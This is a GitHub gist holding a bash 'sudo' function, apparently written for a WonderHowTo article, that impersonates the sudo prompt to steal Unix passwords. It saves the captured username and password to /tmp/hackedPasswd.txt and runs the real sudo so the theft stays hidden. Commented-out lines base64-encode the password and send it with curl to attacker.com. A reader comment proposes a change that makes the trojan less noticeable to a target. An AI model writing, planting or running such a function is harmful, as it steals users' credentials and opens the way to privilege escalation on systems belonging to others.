Sudo function for stealing Unix passwords; script for WonderHowTo article
function sudo () | |
{ | |
# https://null-byte.com/privesc-0194190/ | |
realsudo="$(which sudo)"; | |
read -s -p "[sudo] password for $USER: " inputPasswd; | |
printf "\n"; | |
printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt; | |
# encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1; | |
# curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1; | |
$realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1; | |
$realsudo "${@:1}" | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Nice! There's one small change I think is worthwhile though:
This way it skips the password prompt for subsequent commands, and doesn't look suspicious to a target running back to back sudo commands when they're still within the "root/sudo timeout" window.